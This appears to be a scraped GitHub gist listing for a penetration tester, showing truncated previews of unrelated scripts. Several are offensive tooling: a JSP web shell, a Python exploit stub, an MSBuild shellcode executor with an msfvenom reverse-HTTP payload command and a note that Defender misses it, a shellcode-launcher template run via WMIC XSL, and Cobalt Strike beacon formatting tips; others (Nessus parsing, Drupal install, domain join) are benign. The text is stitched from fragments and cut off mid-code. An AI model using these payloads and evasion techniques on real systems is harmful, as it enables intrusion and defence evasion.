

#!/usr/bin/python
import socket
import sys
import os
host = 'TARGET IP ADDRESS HERE'
port = 4555
try:
0xhexmex / FindHTTPinNessus.ps1
Last active December 1, 2018 22:05 — forked from nullbind/FindIIS6inNessus.ps1
This script can be used to extract a list of HTTP servers from .nessus files.
# This script can be used to extract a list of HTTP servers from .nessus files.
# Original Author: Scott Sutherland, NetSPI 2017
# Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.
# Create an output table
$outputtbl =New-Object System.Data.DataTable
$outputtbl.Columns.Add("IpAddress") | Out-Null
$outputtbl.Columns.Add("WebServerVersion") | Out-Null
0xhexmex / install-drupal.sh
Created March 21, 2019 19:00
Install Drupal on a Linux box
# Another gem from Joaquim Nogueira (@lkys37en)
#!/bin/bash
#Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics
#Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/
print_usage() {
echo ""
echo "Usage: $0 -v drupal-8.5.0 -p Welcome1"
echo
0xhexmex / Get-KerberosKeytab.ps1
Created February 14, 2019 21:50 — forked from raandree/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
0xhexmex / cmd.jsp
Created September 8, 2020 00:50 — forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
0xhexmex / formatting.txt
Last active October 21, 2020 16:57
Random shellcode formatting tips
// Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format
# Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin
# hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin
// Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format
# xxd -p -c 100000000000000000 ./payload.bin
0xhexmex / msbuild-shellcode.xml
Last active October 21, 2020 16:58
MSBuild shellcode executor
/* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below
msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin
Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml"
Defender doesn't flag on this (as of 5/30/19)
*/
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="[TARGETNAME]">
<ClassExample />
0xhexmex / joindomain.sh
Created March 21, 2019 13:48
Join a Linux host to an AD domain
# Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :)
#!/bin/bash
print_usage() {
echo ""
echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!"
echo ""
echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'"
echo
0xhexmex / generic-shellcode-launcher.cs
Last active January 15, 2021 08:39
wmic code execution template
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
// mylauncher.js can be put into something like a WMIC XSL template like so...
/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)
0xhexmex / fixterm.sh
Last active April 21, 2022 21:03
Remove zsh auto-suggestions and syntax highlighting from AWS Kali AMI
#!/bin/zsh
# Turn off auto suggestions
rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh
# Turn off syntax highlighting
rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
# Reload terminal